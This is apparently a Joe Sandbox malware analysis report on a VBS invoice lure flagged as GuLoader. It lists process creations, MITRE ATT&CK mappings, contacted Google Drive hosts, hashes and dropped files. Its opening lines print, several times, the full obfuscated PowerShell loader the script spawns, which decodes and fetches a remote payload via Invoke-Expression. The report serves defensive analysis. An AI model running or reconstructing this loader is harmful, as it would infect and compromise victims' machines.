Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i Erkl			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cabassou.Tun && echo $"			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$epidydimus = 1;$painters21='substrin';$painters21+='g';function antimeningococcic($gejstligt){$nosher=$gejstligt.length-$epidydimus;for($antisnapper=5; $antisnapper -lt $nosher; $antisnapper+=(6)){$taxmen+=$gejstligt.$painters21.invoke($antisnapper, $epidydimus);}$taxmen;}function cairned($fremvisningen){. ($chantors) ($fremvisningen);}$veteraness=antimeningococcic 'manitmneph,onringzregili.hiotlaspirlmet.raklis,/ un.e5svam,. afvi0bryde hjlp(thundwfemmlikoo.dnservidalkohovetuswglaiestaare ttslunddfdstovern erhve1ambas0 vatp.therm0quito;caul nonl wlinieire,ubncarah6feabe4finia;malac .apeixl,lla6re,ro4ungar;pre.n notergastrvagmas:bazzi1tr.me2 neph1spe,l.n ter0sev.r)velve reprig celievasalcchon.kpampaorecta/okkup2prs,r0radom1entoc0vov,d0nonst1hemag0,aama1 ksam familfudadriridgir notcech.llfcenoso .rorxcoons/ warn1f.mte2skede1udgif.ties.0solip ';$maskinafdelinger=antimeningococcic 'indviu,ablesdominebrou,r blok-tabifanuculgseksee ,ccenhandbtoutbu ';$trngendes=antimeningococcic ' alpehdurditafbryttagliphabilskal,i:super/dee,d/feticd showr cymoilokalvreheae lant. tvrfg tjsvo flado resogse,iclsaf,aespiro.lnpolc gillonive muntan/c vilupate cwa,tr?smelteconquxsp itpsta,doservir o.ert ramp=boldhdgeon.ogriotw indkntromllaffreo diskaudmand.orti&phyllide.rwdtaint=nonp,1 pinn0inddanaktivj larmvkoombwcatalcbn.elqag.ip2 undeq kos knonrem.anscz eddyzminiakarticlafkogk poveaardeam wisex,alinzvenge6epit tpenge1recla5,entrjvek,ltlevnep nder2 glycrvinhakraakrbsamfuhpont. ';$skulapstavs=antimeningococcic 'delig>crash ';$chantors=antimeningococcic 'flymeimasonehash.xshei ';$anniversariness = antimeningococcic 'no.mae sta,cbassoh.gpaaoudv.k symp% wi,das,mfupmisr,pmedendha niasystetoverfamotst% .ryd\badescant.cabe alb .esaa,repsshuskesmalguoforesuevolu.fungitstatsupoundnopst palae&disku&chain cretaeradiocsarcohbegrao arar anato$divis ';cairned (antimeningococcic 'unim $afvu,ghenk,love eogallib preaaexinglhilbe:llebrt,entrofort s pahacoversaramifn ana aomski=tor i(antalcac.mpmideendtalel nylon/rif,ec vamb korru$ agara sychnwinten phoniho otvdeltaerudelravilasg lioa,kalmrbastkiaa,eknsol.refortrsblocks .agr)subpr ');cairned (antimeningococcic ' oshy$moblegs.kofl fac,o vocabtrst akonomlpipin:,elchltidssycellano,iefn for ebrnd dsynodssaddela.iata,orbrgrevesepreasngaranedesi.s anjo1sku k6black=affal$ kommtsae nre,astnnedrigailuregodsen.rypad terreldigesunref.bjergsek,popjorddla retistrantmanag(cuber$b gaescarlyk counu r,tulslacka triapfucusslancetlampeaneutrvsa mestral.)septa ');$trngendes=$lynnedslagenes16[0];cairned (antimeningococcic '.ubgo$episkgin.asl ,tamosuprab infoa.esoelthe,r:fniscm.echaeopkrvtaeratakretslh,elclgaussisub efregalaric.icsh oott.geru.irkerbeco e anar= afg nforgre dryrwauric-anlg oam hibtangajfs,ebe amulchvalptgroun friedst nefyforfasengratblodmethrummortho. aludnpropoedomsttpa ad.agouawjobb efletsbsamlic appllchis.i erkl
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$epidydimus = 1;$painters21='substrin';$painters21+='g';function antimeningococcic($gejstligt){$nosher=$gejstligt.length-$epidydimus;for($antisnapper=5; $antisnapper -lt $nosher; $antisnapper+=(6)){$taxmen+=$gejstligt.$painters21.invoke($antisnapper, $epidydimus);}$taxmen;}function cairned($fremvisningen){. ($chantors) ($fremvisningen);}$veteraness=antimeningococcic 'manitmneph,onringzregili.hiotlaspirlmet.raklis,/ un.e5svam,. afvi0bryde hjlp(thundwfemmlikoo.dnservidalkohovetuswglaiestaare ttslunddfdstovern erhve1ambas0 vatp.therm0quito;caul nonl wlinieire,ubncarah6feabe4finia;malac .apeixl,lla6re,ro4ungar;pre.n notergastrvagmas:bazzi1tr.me2 neph1spe,l.n ter0sev.r)velve reprig celievasalcchon.kpampaorecta/okkup2prs,r0radom1entoc0vov,d0nonst1hemag0,aama1 ksam familfudadriridgir notcech.llfcenoso .rorxcoons/ warn1f.mte2skede1udgif.ties.0solip ';$maskinafdelinger=antimeningococcic 'indviu,ablesdominebrou,r blok-tabifanuculgseksee ,ccenhandbtoutbu ';$trngendes=antimeningococcic ' alpehdurditafbryttagliphabilskal,i:super/dee,d/feticd showr cymoilokalvreheae lant. tvrfg tjsvo flado resogse,iclsaf,aespiro.lnpolc gillonive muntan/c vilupate cwa,tr?smelteconquxsp itpsta,doservir o.ert ramp=boldhdgeon.ogriotw indkntromllaffreo diskaudmand.orti&phyllide.rwdtaint=nonp,1 pinn0inddanaktivj larmvkoombwcatalcbn.elqag.ip2 undeq kos knonrem.anscz eddyzminiakarticlafkogk poveaardeam wisex,alinzvenge6epit tpenge1recla5,entrjvek,ltlevnep nder2 glycrvinhakraakrbsamfuhpont. ';$skulapstavs=antimeningococcic 'delig>crash ';$chantors=antimeningococcic 'flymeimasonehash.xshei ';$anniversariness = antimeningococcic 'no.mae sta,cbassoh.gpaaoudv.k symp% wi,das,mfupmisr,pmedendha niasystetoverfamotst% .ryd\badescant.cabe alb .esaa,repsshuskesmalguoforesuevolu.fungitstatsupoundnopst palae&disku&chain cretaeradiocsarcohbegrao arar anato$divis ';cairned (antimeningococcic 'unim $afvu,ghenk,love eogallib preaaexinglhilbe:llebrt,entrofort s pahacoversaramifn ana aomski=tor i(antalcac.mpmideendtalel nylon/rif,ec vamb korru$ agara sychnwinten phoniho otvdeltaerudelravilasg lioa,kalmrbastkiaa,eknsol.refortrsblocks .agr)subpr ');cairned (antimeningococcic ' oshy$moblegs.kofl fac,o vocabtrst akonomlpipin:,elchltidssycellano,iefn for ebrnd dsynodssaddela.iata,orbrgrevesepreasngaranedesi.s anjo1sku k6black=affal$ kommtsae nre,astnnedrigailuregodsen.rypad terreldigesunref.bjergsek,popjorddla retistrantmanag(cuber$b gaescarlyk counu r,tulslacka triapfucusslancetlampeaneutrvsa mestral.)septa ');$trngendes=$lynnedslagenes16[0];cairned (antimeningococcic '.ubgo$episkgin.asl ,tamosuprab infoa.esoelthe,r:fniscm.echaeopkrvtaeratakretslh,elclgaussisub efregalaric.icsh oott.geru.irkerbeco e anar= afg nforgre dryrwauric-anlg oam hibtangajfs,ebe amulchvalptgroun friedst nefyforfasengratblodmethrummortho. aludnpropoedomsttpa ad.agouawjobb efletsbsamlic appllchis.i erkl			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	11 Command and Scripting Interpreter	221 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FACTURA 130424435.vbs	24%	ReversingLabs	Script-WScript.Trojan.Guloader
FACTURA 130424435.vbs	12%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
bg.microsoft.map.fastly.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://go.micro	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	0%, Virustotal, Browse	unknown
drive.google.com	142.250.105.102	true	false		high
drive.usercontent.google.com	173.194.219.132	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com	powershell.exe, 00000002.00000002.1485282092.000001C58046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C5804F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581E49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C580488000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1520345452.000001C5901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://drive.usercontent.google.com	powershell.exe, 00000002.00000002.1485282092.000001C581DEE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware URL Reputation: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000002.00000002.1485282092.000001C5812CB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1520345452.000001C5901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.googP	powershell.exe, 00000002.00000002.1485282092.000001C581DAF000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://drive.google.com	powershell.exe, 00000002.00000002.1485282092.000001C5818BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.googh	powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.google.com	powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C58048C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://drive.google.com	powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.1485282092.000001C580001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	powershell.exe, 00000002.00000002.1485282092.000001C58046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C5804F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581E49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1485282092.000001C580001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.105.102	drive.google.com	United States		15169	GOOGLEUS	false
173.194.219.132	drive.usercontent.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1427933
Start date and time:	2024-04-18 11:05:02 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FACTURA 130424435.vbs
Detection:	MAL
Classification:	mal100.expl.evad.winVBS@6/6@2/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 5 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 1644 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:05:53	API Interceptor	1x Sleep call for process: wscript.exe modified
11:05:55	API Interceptor	47x Sleep call for process: powershell.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	justificant de transfer#U00e8ncia.vbs	Get hash	malicious	Unknown	Browse	199.232.214.172
	Justificante de pago.vbs	Get hash	malicious	Unknown	Browse	199.232.210.172
	awb_shipping_documents_17_04_2024_00000.vbs	Get hash	malicious	GuLoader, Remcos	Browse	199.232.214.172
	http://185.91.69.110	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://ranchpools.com	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://windowdefalerts-error0x21903-alert-virus-detected.pages.dev/	Get hash	malicious	TechSupportScam	Browse	199.232.210.172
	https://windowdefalerts-error0x21908-alert-virus-detected.pages.dev/	Get hash	malicious	TechSupportScam	Browse	199.232.210.172
	https://windowdefalerts-error0x21902-alert-virus-detected.pages.dev/	Get hash	malicious	TechSupportScam	Browse	199.232.214.172
	https://www.applelswlqod.top/all/login.php?idsmt=10123005600&nextfunck=10130550000	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://17.104-168-101-28.cprapid.com/PayPal/	Get hash	malicious	Unknown	Browse	199.232.210.172

ASNs

⊘No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	justificant de transfer#U00e8ncia.vbs	Get hash	malicious	Unknown	Browse	142.250.105.102 173.194.219.132
	Justificante de pago.vbs	Get hash	malicious	Unknown	Browse	142.250.105.102 173.194.219.132
	Purchase Order PDF.exe	Get hash	malicious	AgentTesla	Browse	142.250.105.102 173.194.219.132
	Leoch-Purchase Order.exe	Get hash	malicious	AgentTesla	Browse	142.250.105.102 173.194.219.132
	p silp AI240190.pdf.exe	Get hash	malicious	AgentTesla	Browse	142.250.105.102 173.194.219.132
	SecuriteInfo.com.Variant.MSILHeracles.77820.8707.3938.exe	Get hash	malicious	Unknown	Browse	142.250.105.102 173.194.219.132
	SecuriteInfo.com.Win32.PWSX-gen.1728.1300.exe	Get hash	malicious	AgentTesla	Browse	142.250.105.102 173.194.219.132
	SecuriteInfo.com.Heur.15333.25205.exe	Get hash	malicious	AgentTesla	Browse	142.250.105.102 173.194.219.132
	SecuriteInfo.com.Variant.MSILHeracles.77820.8707.3938.exe	Get hash	malicious	Unknown	Browse	142.250.105.102 173.194.219.132
	Leoch-Purchase Order.exe	Get hash	malicious	AgentTesla	Browse	142.250.105.102 173.194.219.132

Process:	C:\Windows\System32\wscript.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	69993
Entropy (8bit):	7.99584879649948
Encrypted:	true
SSDEEP:	1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
MD5:	29F65BA8E88C063813CC50A4EA544E93
SHA1:	05A7040D5C127E68C25D81CC51271FFB8BEF3568
SHA-256:	1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
SHA-512:	E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[I.hOB."..rK.RQ..}f..f...}....9.\|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..\|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..\|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	3.223566515555164
Encrypted:	false
SSDEEP:	6:kKglEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:YlbkPlE99SNxAhUeVLVt
MD5:	C8362B314414FD8CCA682F001E87EDB8
SHA1:	E53A670B4CEA3AD3DA6941B52D5A6B20977112D0
SHA-256:	3C8C8D1BB778808877F2470A433A5502D785E7E0447F2E5AFE7BEB4ACD81C25B
SHA-512:	E0FB8E271C1A2215258E0B46BAFFF101BA22AB45F45390D8A3E8A558E413BFB89229B8057CAE287B2819115096DFE2945451F0B29BB0651863946FA41D13F06B
Malicious:	false
Reputation:	low
Preview:	p...... ........}..o...(....................................................... ........M.........(.....wl....i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulbnolz:NllUc
MD5:	F23953D4A58E404FCB67ADD0C45EB27A
SHA1:	2D75B5CACF2916C66E440F19F6B3B21DFD289340
SHA-256:	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
SHA-512:	B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
Malicious:	false
Reputation:	moderate, very likely benign file
